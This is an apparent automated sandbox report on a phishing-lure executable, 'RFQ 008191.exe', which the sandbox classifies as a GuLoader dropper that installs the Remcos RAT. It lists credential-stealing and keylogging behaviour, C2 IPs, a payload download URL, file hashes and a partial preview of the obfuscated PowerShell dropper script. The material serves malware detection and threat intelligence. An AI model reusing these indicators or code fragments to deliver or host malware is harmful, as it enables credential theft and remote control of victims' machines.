    • signatures: Early bird code injection technique detected; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; 3 other signatures
    • Juryen.exe [3 15] started
      • network: 212.162.149.91, ports 2404, 49793, 49799 (UNREAL-SERVERSUS, Netherlands); 212.162.149.89, ports 49784, 80 (UNREAL-SERVERSUS, Netherlands); geoplugin.net 178.237.33.50, ports 49801, 80 (ATOM86-ASATOM86NL, Netherlands)
      • dropped: C:\ProgramData\remcos\logs.dat (data)
      • signatures: Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); Detected Remcos RAT; 5 other signatures
      • Juryen.exe [1] started: Tries to steal Instant Messenger accounts or passwords; Tries to harvest and steal browser information (history, passwords, etc)
      • Juryen.exe [1] started: Tries to steal Mail credentials (via file / registry access)
      • Juryen.exe [14] started
    • conhost.exe started

Source | Detection | Scanner | Label
RFQ 008191.exe | 18% | ReversingLabs |
RFQ 008191.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\Juryen.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\Juryen.exe | 18% | ReversingLabs |

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
http://www.imvu.comppData | 0% | Avira URL Cloud | safe
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | 0% | Avira URL Cloud | safe
http://212.162.149.89/wwVHOGRH148.bins | 0% | Avira URL Cloud | safe
http://www.imvu.comr | 0% | Avira URL Cloud | safe
http://212.162.149.89/wwVHOGRH148.bin | 0% | Avira URL Cloud | safe
http://www.ebuddy.com | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
geoplugin.net | 178.237.33.50 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://geoplugin.net/json.gp | false | | high
http://212.162.149.89/wwVHOGRH148.bin | false | Avira URL Cloud: safe | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000006.00000002.1766181326.0000000005C2C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000006.00000002.1762545128.0000000004D16000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.imvu.comr | Juryen.exe, 0000000B.00000002.2542705888.000000001F720000.00000040.10000000.00040000.00000000.sdmp, Juryen.exe, 0000000F.00000002.1880775989.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp& | Juryen.exe, 0000000B.00000002.2528307519.0000000002EAE000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000006.00000002.1762545128.0000000004D16000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000006.00000002.1762545128.0000000004D16000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000006.00000002.1762545128.0000000004D16000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000006.00000002.1766181326.0000000005C2C000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://geoplugin.net/json.gphy | Juryen.exe, 0000000B.00000002.2528307519.0000000002E96000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.imvu.com | Juryen.exe, Juryen.exe, 0000000F.00000003.1880468582.000000000079D000.00000004.00000020.00020000.00000000.sdmp, Juryen.exe, 0000000F.00000003.1880426183.000000000079D000.00000004.00000020.00020000.00000000.sdmp, Juryen.exe, 0000000F.00000002.1880775989.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000006.00000002.1766181326.0000000005C2C000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://geoplugin.net/json.gpq | Juryen.exe, 0000000B.00000002.2528307519.0000000002E96000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.imvu.comppData | Juryen.exe, 0000000F.00000003.1880468582.000000000079D000.00000004.00000020.00020000.00000000.sdmp, Juryen.exe, 0000000F.00000003.1880426183.000000000079D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nirsoft.net | Juryen.exe, 0000000D.00000002.1905221052.0000000000193000.00000004.00000010.00020000.00000000.sdmp | false | | high
http://nsis.sf.net/NSIS_ErrorError | RFQ 008191.exe, Juryen.exe.6.dr | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000006.00000002.1762545128.0000000004D16000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | Juryen.exe, 0000000B.00000002.2542705888.000000001F720000.00000040.10000000.00040000.00000000.sdmp, Juryen.exe, 0000000F.00000002.1880775989.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com | Juryen.exe, Juryen.exe, 0000000F.00000002.1880775989.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
http://212.162.149.89/wwVHOGRH148.bins | Juryen.exe, 0000000B.00000002.2528307519.0000000002E96000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000006.00000002.1762545128.0000000004BC1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000006.00000002.1762545128.0000000004D16000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000006.00000002.1766181326.0000000005C2C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000006.00000002.1766181326.0000000005C2C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/accounts/servicelogin | Juryen.exe | false | | high
https://login.yahoo.com/config/login | Juryen.exe | false | | high
http://www.nirsoft.net/ | Juryen.exe, 0000000F.00000002.1880775989.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000006.00000002.1762545128.0000000004BC1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.ebuddy.com | Juryen.exe, Juryen.exe, 0000000F.00000002.1880775989.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
212.162.149.91 | unknown | Netherlands | 64236 | UNREAL-SERVERSUS | true
212.162.149.89 | unknown | Netherlands | 64236 | UNREAL-SERVERSUS | false
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1572498
                                                                Start date and time:2024-12-10 16:27:09 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 7m 57s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:19
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:RFQ 008191.exe
                                                                Detection:MAL
                                                                Classification:mal100.phis.troj.spyw.evad.winEXE@12/17@1/3
                                                                EGA Information:
                                                                • Successful, ratio: 83.3%
                                                                HCA Information:
                                                                • Successful, ratio: 97%
                                                                • Number of executed functions: 185
                                                                • Number of non-executed functions: 257
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                • Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
                                                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                • Execution Graph export aborted for target powershell.exe, PID 1264 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • VT rate limit hit for: RFQ 008191.exe
Time | Type | Description
10:28:06 | API Interceptor | 32x Sleep call for process: powershell.exe modified
11:45:45 | API Interceptor | 80397x Sleep call for process: Juryen.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
212.162.149.91 | order CF08093-24.exe | Get hash | malicious | Remcos, GuLoader | Browse |
212.162.149.89 | order CF08093-24.exe | Get hash | malicious | Remcos, GuLoader | Browse | 212.162.149.89/xONeIbG151.bin
212.162.149.89 | PO. A-72 9234567.exe | Get hash | malicious | FormBook, GuLoader | Browse | 212.162.149.89/KSMZNlmay152.bin
178.237.33.50 | PO-8776-2024.js | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | order CF08093-24.exe | Get hash | malicious | Remcos, GuLoader | Browse | geoplugin.net/json.gp
178.237.33.50 | matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta | Get hash | malicious | Cobalt Strike, Remcos, HTMLPhisher | Browse | geoplugin.net/json.gp
178.237.33.50 | WgGo0xd2p8.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | 173378939937efea07b4bc781b0b774c712430f5494a016d81092444624b7a38c4894091d6159.dat-decoded.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | 1733782507080baec6756496aa00a9de94bd4b6146711872f8ab63e40379ca627825be54c2492.dat-decoded.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | 4wECQoBvYC.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | Aktarma,pdf.vbs | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | Ref#60031796.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | PEbZthAqV9.exe | Get hash | malicious | Remcos, PureLog Stealer | Browse | geoplugin.net/json.gp
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
geoplugin.net | PO-8776-2024.js | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | order CF08093-24.exe | Get hash | malicious | Remcos, GuLoader | Browse | 178.237.33.50
geoplugin.net | matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta | Get hash | malicious | Cobalt Strike, Remcos, HTMLPhisher | Browse | 178.237.33.50
geoplugin.net | WgGo0xd2p8.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | 173378939937efea07b4bc781b0b774c712430f5494a016d81092444624b7a38c4894091d6159.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | 1733782507080baec6756496aa00a9de94bd4b6146711872f8ab63e40379ca627825be54c2492.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | 4wECQoBvYC.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | Aktarma,pdf.vbs | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | Ref#60031796.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | PEbZthAqV9.exe | Get hash | malicious | Remcos, PureLog Stealer | Browse | 178.237.33.50
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
UNREAL-SERVERSUS | purchase.order.exe | Get hash | malicious | FormBook, GuLoader | Browse | 212.162.149.66
UNREAL-SERVERSUS | Forhandlingsfriheden.exe | Get hash | malicious | FormBook, GuLoader | Browse | 212.162.149.66
UNREAL-SERVERSUS | order CF08093-24.exe | Get hash | malicious | Remcos, GuLoader | Browse | 212.162.149.89
UNREAL-SERVERSUS | PO. A-72 9234567.exe | Get hash | malicious | FormBook, GuLoader | Browse | 212.162.149.89
UNREAL-SERVERSUS | la.bot.arm7.elf | Get hash | malicious | Mirai | Browse | 162.251.123.175
UNREAL-SERVERSUS | file.exe | Get hash | malicious | RedLine | Browse | 212.162.149.48
UNREAL-SERVERSUS | https://haqzt.trc20.kcgrocks.com/merchantServices | Get hash | malicious | Unknown | Browse | 172.96.10.214
UNREAL-SERVERSUS | scan_241205-801_draft_PO.exe | Get hash | malicious | Remcos, GuLoader | Browse | 162.251.122.87
UNREAL-SERVERSUS | 1g4lfpPUqt.exe | Get hash | malicious | GuLoader | Browse | 212.162.149.63
UNREAL-SERVERSUS | purchase order.exe | Get hash | malicious | FormBook, GuLoader | Browse | 212.162.149.66
ATOM86-ASATOM86NL | PO-8776-2024.js | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | order CF08093-24.exe | Get hash | malicious | Remcos, GuLoader | Browse | 178.237.33.50
ATOM86-ASATOM86NL | matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta | Get hash | malicious | Cobalt Strike, Remcos, HTMLPhisher | Browse | 178.237.33.50
ATOM86-ASATOM86NL | WgGo0xd2p8.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | 173378939937efea07b4bc781b0b774c712430f5494a016d81092444624b7a38c4894091d6159.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | 1733782507080baec6756496aa00a9de94bd4b6146711872f8ab63e40379ca627825be54c2492.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | 4wECQoBvYC.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | Aktarma,pdf.vbs | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | Ref#60031796.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | PEbZthAqV9.exe | Get hash | malicious | Remcos, PureLog Stealer | Browse | 178.237.33.50
                                                                  No context
                                                                  No context
                                                                  Process:C:\Users\user\AppData\Local\Temp\Juryen.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):144
                                                                  Entropy (8bit):3.3544524354439966
                                                                  Encrypted:false
                                                                  SSDEEP:3:rhlKlyKOlfUlUlEKWNqlDl5JWRal2Jl+7R0DAlBG45klovDl6v:6lZ6UlUU4b5YcIeeDAlOWAv
                                                                  MD5:179D67D7467E6C4138342551A4FA9EDA
                                                                  SHA1:91802D56D509C2DD6BD1246CD22FEC6231F93A7E
                                                                  SHA-256:95D80AE3C2A7DBF0547AD7FAB7BC400639C5D7BF6DBEBCCF404AA6A64AD06428
                                                                  SHA-512:8828B4F028481DCB52C712C1A798F0E7953F40E6BD8522147F9E5559A6A0BDBC4023E6BD13F49FC5CB36AA4D0ED94A9A0BC4DF4C8551613C843C07605A91BFA0
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                  Reputation:low
                                                                  Preview:....[.2.0.2.4./.1.2./.1.0. .1.1.:.4.5.:.1.3. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                  Process:C:\Users\user\AppData\Local\Temp\Juryen.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):963
                                                                  Entropy (8bit):5.014252336516381
                                                                  Encrypted:false
                                                                  SSDEEP:12:tkluand66GkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkw7S:qluWdbauKyGX85jvXhNlT3/7CcVKWro
                                                                  MD5:41AED8C7FD9535846FF1B201970579A9
                                                                  SHA1:670A7F736F7571C2584484D52552D408CD890A56
                                                                  SHA-256:F4379452004FC2CFE9D69CE016752E7A84725BD2FBF7AE0E74B6006FABE9F6E8
                                                                  SHA-512:C71EFACE69AE6B28D6A1A7BCBCDB7A6C914C24D43197F5F989B20A2BE4670C6BB8381A4EB3847EBA2DF5C3F8BE5229ADE4FB787811DA493ECDCCD82934F144B9
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:{. "geoplugin_request":"8.46.123.175",. "geoplugin_status":200,. "geoplugin_delay":"0ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7503",. "geoplugin_longitude":"-74.0014",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:modified
                                                                  Size (bytes):53158
                                                                  Entropy (8bit):5.062687652912555
                                                                  Encrypted:false
                                                                  SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                  MD5:5D430F1344CE89737902AEC47C61C930
                                                                  SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                  SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                  SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                                  Process:C:\Users\user\Desktop\RFQ 008191.exe
                                                                  File Type:Unicode text, UTF-8 text, with very long lines (4247), with CRLF, LF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):74877
                                                                  Entropy (8bit):5.186902050952871
                                                                  Encrypted:false
                                                                  SSDEEP:1536:YiZ5FgjrNcgoGx0Cq+PvEjBJajOMoNEhlUsKpYXG0qCr:XLFXhGNq/j3rPaoYG0p
                                                                  MD5:DFB785AB6C7A90CD2A2F0FEDE39565D3
                                                                  SHA1:D48DCC0968EB6A323231B67ABF5C19BB7879384A
                                                                  SHA-256:8D76FECA48E11BDD7F2667042C44AC26C5BEEAA37471775945E373FAC37D0475
                                                                  SHA-512:D998DAC5B7D83201DC4742673ECD46F8A2125C4A3360BE620D154A0D0A2278F8C8D0B3554D3119C38C446D8E2EB5A09158F06329E46BB7FD90D992A3DF9A2806
                                                                  Malicious:false
                                                                  Preview:$Surginess=$Kjeldahlize79;........$Postsplenial = @'.Musikan.H lvgud$Sh.malgJrouncyfoInvin.irInsemindMorp inb,ernesaa UgennesUcayaleeLorinerrBehandleNocuousdDionisieJeddock= G stro$D llsniMDitetikiHygrogrdPlantaiwRhizopoe Flakkos Fili itTrangsv;Prmieob.PlaintifMenstruuInbeaminForfattcSen.tsbt aboteuiProsel,oUdstempnbaga,eh ConoidsaindiffekForktritAndelshiMisapprv in erceVelfundr Tilstdi kappefnSpoilbagFumariusBemoanet Snipeda ActinoslsestoftK emand Firmaad(Cornopo$ JoomenTKonversiB svrenl Se umilRegistraF isegudLinjetle rieflelfluorini .mmelsg B,jobgeepaulets Hand l, Taeppe$dodeca,SAntabusthesternrBurdenli St.kirp MasseopStik roeTjavssttL,ptapd)Or.itho opydel{Jellyfi.unprinc.Convene$ NyctanDBuxomn o Resu dkUdrkeneuhvisk.dmS arrieeKosmonanFlaunchtSiliciusFyldestiRyperspd KoscheeMaterienGineppa Ve,ezue(WelchersDvrgpiluT,temerf geratofEntomoslUdfrelssAfdr maestresslrdoubtednSkal,nieHjemmeh Stif.m'O ercivDHypernaaBat sens.euterohFairwayiHung,rtsBevy,rapforudse$KabbeljRFremvi,uE.rovissFo
                                                                  Process:C:\Users\user\Desktop\RFQ 008191.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):493903
                                                                  Entropy (8bit):1.2514017425028907
                                                                  Encrypted:false
                                                                  SSDEEP:1536:J5fAgVg2t2pObnNoCYrlANC4fcmCuJyzbffMxL+hJfryobV3Krqx1TJG:r/Bb+CYr2cbPiihhqUO
                                                                  MD5:8B4C2BBEDD252D6BB6DB679AB3723802
                                                                  SHA1:2D9775744675D3B32F3CA2FDF975C9293B719926
                                                                  SHA-256:9CCADD82A127BA29D7BA291CB307753D060CA26A3C3CCBCB9EDB3F3A38E5EE31
                                                                  SHA-512:7940E4CE5AB08DDFE4DB8B2676F9B92C51DC794C8772760C279B8BC57B7C97502ADBF91747D4FA57BAA6B5B695504E090875DF6890D478B8FD6CF8D70B3C8F65
                                                                  Malicious:false
                                                                  Process:C:\Users\user\Desktop\RFQ 008191.exe
                                                                  File Type:data
                                                                  Category:modified
                                                                  Size (bytes):340924
                                                                  Entropy (8bit):1.2553271369192232
                                                                  Encrypted:false
                                                                  SSDEEP:768:rmUSNMYYmaSwBaGhKmULRAGcnjPDQ5lHJ30U5MFvsAkhuD7odAmLVBeOdlfHV22E:vvCsDuqEZ11vtew5dzv9
                                                                  MD5:C41E860BAAE2CC8168C2ABD50BB5BDF4
                                                                  SHA1:548575B164EDA9485A2B3F66161C8024619B6423
                                                                  SHA-256:601CF3825DCDD9076ED0A3CB778F62AF942CF20D64D3F86335A57B43E29F2B52
                                                                  SHA-512:9D2D97A7CAE52202807093ABF8BF4DE3F01BF54BAFF02C8110D800A7E6B1F6290B3ED60FB954809F9231BEDF730CA7244E9E51EE6B6074445DB180EB0E956718
                                                                  Malicious:false
                                                                  Process:C:\Users\user\Desktop\RFQ 008191.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):329414
                                                                  Entropy (8bit):7.60419396464743
                                                                  Encrypted:false
                                                                  SSDEEP:6144:Ook9OUL0/vWBuiWACusaIJuUHQ1YEByb6rIAVFuH6XrXY:I0XWBuhA9Z4Q1YEUbaI+yajY
                                                                  MD5:06A40C4700069BCCB064BAB052AFEF0E
                                                                  SHA1:7A3DF76B80E59EE1BA6F7E7B7A58FC3BE5FF078C
                                                                  SHA-256:27C6CF4CD16539ADDF77DAB5CCF4274BA6B31783D873FB2D12B5CD62EECB7803
                                                                  SHA-512:DF57EAB67A428FCD9D17421AD5BD721522D30E241923C00239DF695784D43194C930341B996F28BDC6C5165EDB2E383A75A4224845311E32B8A9085E063FDCE6
                                                                  Malicious:false
                                                                  Process:C:\Users\user\Desktop\RFQ 008191.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):437071
                                                                  Entropy (8bit):1.253825384833456
                                                                  Encrypted:false
                                                                  SSDEEP:768:uWsvcxI4BCLNVp0kyRWlxp4pkE5sS+ZA4o7VengmxKgoMqbGam2C1afEUe/u41Az:2T4BC0SG4J+VB8GA2pzEszrq2GrwLnj
                                                                  MD5:F030199A57CDBFC5D06AC8BFB59059C3
                                                                  SHA1:3C7AA5EA48CBAA34C8426B76498CD4BF5BF644BF
                                                                  SHA-256:FD1253B138D560D3AD0A56C32F37D0FDBDE9E16CC37E59E991595C7349B1F087
                                                                  SHA-512:7EC5E2553A15923396B77E07685172CEEAFDE8F60CCBB97E0796DCB8E1BBA8FF17F1CA242B143AD497942FDC8D7473AEFB5091E6492616B3D8C0EBCBA13C98C2
                                                                  Malicious:false
                                                                  Process:C:\Users\user\Desktop\RFQ 008191.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):484281
                                                                  Entropy (8bit):1.2585657408825282
                                                                  Encrypted:false
                                                                  SSDEEP:1536:ZtZbLcPMi2av+CVKljwe/ieUZ39FbMXVvL:PyPrdCBlotFbO
                                                                  MD5:A8740E0A6C72618AB3FB8804F4835BEF
                                                                  SHA1:6393CB3D9E3E670BA5C96F4A757F5B198196EB15
                                                                  SHA-256:EF5DB6A0097473B03CCF2A1E6152E2AC7AC57BB31B31A06529BCD3900E9C097C
                                                                  SHA-512:55740B7FE5A3D26FC47F9695B2FD33C045E67E6E36F0D2121235C2AEA9800F19740C1B0F797E32E8108E10245D8A4616308173E24A61129D82B9D60500C8763C
                                                                  Malicious:false
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                  Category:dropped
                                                                  Size (bytes):795710
                                                                  Entropy (8bit):7.828737109365321
                                                                  Encrypted:false
                                                                  SSDEEP:12288:UXqlVfD6qKMwy8kjKsge8jLAMsnI8c78pc+HeV4PRklT3we+doWVkeehown:UXqzrTK5XsgervnIac+Hm4QT31V1hown
                                                                  MD5:82BA32E4800897E8BAFB32990D29F60A
                                                                  SHA1:21B724DF29B7DDBCD88849E7AD6AB12A4D266C4C
                                                                  SHA-256:777441225B9D294BACA2F689286A1F70A0FC28007E86CF1CC099C71EE1D826F2
                                                                  SHA-512:7E741FAB4E31223A967C4194F31E4FD592B75DC14DDE4C72C3FBD5EFB28F312807F886290FA8A227037890375D3ADA7597857138F4DF4D905B0AE4CA7B906101
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 18%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................f...".......5............@.......................................@..........................................................................................................................................................text...ve.......f.................. ..`.rdata..X............j..............@..@.data...8............~..............@....ndata...0...............................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):26
                                                                  Entropy (8bit):3.95006375643621
                                                                  Encrypted:false
                                                                  SSDEEP:3:ggPYV:rPYV
                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                  Malicious:true
                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
